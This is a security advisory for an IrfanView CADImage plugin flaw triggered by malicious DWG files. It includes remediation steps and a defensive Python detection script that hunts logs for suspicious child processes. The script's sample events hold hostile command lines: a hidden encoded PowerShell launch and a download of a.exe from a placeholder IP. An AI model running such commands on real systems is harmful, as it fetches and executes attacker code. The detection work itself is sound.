CVE-2025-7236

IrfanView · IrfanView Multiple Products

A high-severity vulnerability has been discovered in the IrfanView image viewer, specifically within its CADImage plugin.

Executive summary

A high-severity vulnerability has been discovered in the IrfanView image viewer, specifically within its CADImage plugin. An attacker could exploit this flaw by tricking a user into opening a specially crafted DWG drawing file, which could allow the attacker to execute arbitrary code and take full control of the affected system. This presents a significant risk of data theft, malware infection, or further network compromise.

Vulnerability

The vulnerability is a memory corruption flaw in the CADImage plugin that IrfanView loads to display CAD drawings. It is triggered while the plugin parses a malformed Drawing (DWG) file. An attacker who gets a user to open a specially crafted DWG file in a vulnerable IrfanView build can cause a memory-safety error (such as a buffer overflow) in the parser. Because the plugin runs inside the IrfanView process, corrupting its memory can lead to execution of attacker-controlled code with the privileges of the user who launched IrfanView; no elevation is involved, but a standard user's session is enough to read the user's data, persist, and reach the rest of the network.

Business impact

This vulnerability is rated as High severity with a CVSS score of 7.8. Successful exploitation could lead to a complete compromise of the user's workstation. The primary business impact includes the potential for data exfiltration of sensitive corporate or personal information, installation of persistent malware such as ransomware or spyware, and the use of the compromised machine as a foothold to move laterally across the corporate network. Organizations where employees use IrfanView to handle files from external sources (e.g., email attachments, web downloads) are at a heightened risk of a targeted attack.

Remediation

Immediate Action: Apply the vendor's fixed release to every system with IrfanView installed. Because CADImage is a separately distributed plugin rather than part of the main executable, updating IrfanView alone may leave the vulnerable plugin DLL in place; after updating, confirm the version of the CADImage plugin in IrfanView's Plugins folder, and remember that IrfanView is frequently installed per-user or run as a portable copy, which a machine-wide software inventory may not see. Prioritize workstations whose users regularly receive files from outside the organization (email attachments, web downloads, customer-supplied drawings). After patching, review endpoint and application logs for earlier signs of exploitation attempts involving IrfanView or DWG files.

Proactive Monitoring: Implement monitoring to detect exploitation attempts. Watch the Windows Application event log for IrfanView crashes (Application Error, Event ID 1000, with i_view32.exe or i_view64.exe as the faulting application; a crash is the most common outcome of a malformed DWG that fails to land cleanly). Configure Endpoint Detection and Response (EDR) or Sysmon process-creation alerts for suspicious child processes (cmd.exe, powershell.exe, mshta.exe, rundll32.exe and similar) whose parent is i_view32.exe or i_view64.exe; IrfanView legitimately launches an external editor or viewer on request, so alert on a list of living-off-the-land binaries rather than on every child. Correlate these with the IrfanView command line, which carries the path of the opened file, so a shell spawned within minutes of a .dwg being opened can be escalated. Finally, watch for unusual outbound connections from the workstation immediately after a DWG file has been opened.
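The following is an added detection example written for this advisory, not tooling from IrfanView or from the advisory's authors. It applies the monitoring logic above to process-creation telemetry: each record uses Sysmon Event ID 1 field names (UtcTime, Computer, Image, CommandLine, ParentImage, User), flags a living-off-the-land binary whose parent is i_view32.exe or i_view64.exe, and raises the severity when IrfanView was launched with a .dwg on its command line on the same host within the preceding ten minutes. The child-process list, the ten-minute window and the sample events are assumptions and constructed data, not observed attacker behaviour.

```python
"""Added example: hunt process-creation logs for IrfanView spawning a shell
after a DWG file was opened. Records use Sysmon Event ID 1 field names; the
SAMPLE_EVENTS below are constructed, not real telemetry."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass
from datetime import datetime, timedelta

IRFANVIEW_IMAGES = {"i_view32.exe", "i_view64.exe"}
# Binaries an image viewer has no business launching (assumption: tune per site).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
# A suspicious child this soon after a .dwg open is treated as high severity (assumption).
DWG_WINDOW = timedelta(minutes=10)


@dataclass(frozen=True)
class ProcEvent:
    utc_time: datetime
    host: str
    image: str
    command_line: str
    parent_image: str
    user: str


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    severity: str
    parent: str
    child: str
    command_line: str


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any OS."""
    return ntpath.basename(path).lower()


def parse_event(rec: dict) -> ProcEvent:
    """Convert one Sysmon-style record (Event ID 1 field names) to a ProcEvent."""
    return ProcEvent(
        utc_time=datetime.strptime(rec["UtcTime"], "%Y-%m-%d %H:%M:%S.%f"),
        host=rec["Computer"],
        image=rec["Image"],
        command_line=rec.get("CommandLine", ""),
        parent_image=rec.get("ParentImage", ""),
        user=rec.get("User", ""),
    )


def find_alerts(records: list[dict]) -> list[Alert]:
    events = sorted((parse_event(r) for r in records), key=lambda e: e.utc_time)
    # Times at which IrfanView was started with a .dwg on its command line, per host.
    dwg_opens = [
        (e.host, e.utc_time) for e in events
        if _name(e.image) in IRFANVIEW_IMAGES and ".dwg" in e.command_line.lower()
    ]
    alerts: list[Alert] = []
    for e in events:
        if _name(e.parent_image) not in IRFANVIEW_IMAGES:
            continue
        child = _name(e.image)
        if child not in SUSPICIOUS_CHILDREN:
            continue  # e.g. an external editor opened from IrfanView is expected
        recent_dwg = any(
            host == e.host and timedelta(0) <= e.utc_time - t <= DWG_WINDOW
            for host, t in dwg_opens
        )
        alerts.append(Alert(
            host=e.host, user=e.user,
            severity="high" if recent_dwg else "medium",
            parent=_name(e.parent_image), child=child, command_line=e.command_line,
        ))
    return alerts


# Constructed sample telemetry: an exploitation-like chain on WS-ALICE, a benign
# editor launch, and a shell spawn with no DWG context on WS-BOB.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-07-15 10:00:05.101", "Computer": "WS-ALICE", "User": "CORP\\alice",
     "Image": r"C:\Program Files\IrfanView\i_view64.exe",
     "CommandLine": r'"C:\Program Files\IrfanView\i_view64.exe" "C:\Users\alice\Downloads\site-plan.dwg"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"UtcTime": "2025-07-15 10:00:09.470", "Computer": "WS-ALICE", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -w hidden -enc SQBFAFgA...",
     "ParentImage": r"C:\Program Files\IrfanView\i_view64.exe"},
    {"UtcTime": "2025-07-15 10:02:00.000", "Computer": "WS-ALICE", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\mspaint.exe",
     "CommandLine": r'"C:\Windows\System32\mspaint.exe" "C:\Users\alice\Pictures\logo.png"',
     "ParentImage": r"C:\Program Files\IrfanView\i_view64.exe"},
    {"UtcTime": "2025-07-15 11:30:12.250", "Computer": "WS-BOB", "User": "CORP\\bob",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -c iwr http://198.51.100.7/a.exe -o a.exe",
     "ParentImage": r"C:\Program Files\IrfanView\i_view64.exe"},
]

if __name__ == "__main__":
    for a in find_alerts(SAMPLE_EVENTS):
        print(f"[{a.severity.upper()}] {a.host} {a.user}: {a.parent} -> {a.child} :: {a.command_line}")
```

Run against the sample, this flags the cmd.exe launched four seconds after site-plan.dwg was opened on WS-ALICE as high, the powershell.exe on WS-BOB (no DWG context) as medium, and ignores the mspaint.exe edit. In production the same rule would be expressed in the EDR or SIEM query language and fed from the real process-creation source; the .dwg correlation works because Explorer passes the opened file's path on IrfanView's command line.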

Compensating Controls: If patching cannot be immediately deployed, consider the following compensating controls:

  • User Awareness: Instruct users not to open DWG files from untrusted or unknown sources, and to report unexpected drawings received by email.
  • File Association and Plugin Removal: Temporarily remove the .dwg association from IrfanView so a double-click no longer opens the file in it. Since the flaw lives in the plugin rather than the viewer, removing or renaming the CADImage plugin DLL in IrfanView's Plugins folder disables DWG parsing altogether; this also has to be done for per-user and portable installs.
  • Application Control and Exploit Mitigations: AppLocker and Windows Defender Application Control restrict which executables may run at all; they do not express parent-child rules, so use an EDR prevention policy to block i_view32.exe and i_view64.exe from spawning command interpreters and scripting hosts. Enforcing Windows Exploit Protection mitigations (DEP, mandatory ASLR) on the IrfanView executables raises the cost of turning the memory corruption into code execution but does not remove the bug.

Exploitation status

Public Exploit Available: False

Analyst recommendation

Given the high severity (CVSS 7.8) and the potential for arbitrary code execution from a single malicious file, all vulnerable IrfanView installations, including the separately distributed CADImage plugin, should be updated immediately. Exploitation requires user interaction, but opening an attachment or download is exactly what phishing reliably obtains, and DWG drawings are routine attachments in engineering, construction and manufacturing workflows. This CVE is not currently on the CISA KEV list and no public exploit is known, but file-parser bugs in a widely deployed viewer are a recurring target, so patching should be prioritized before exploitation is observed rather than after.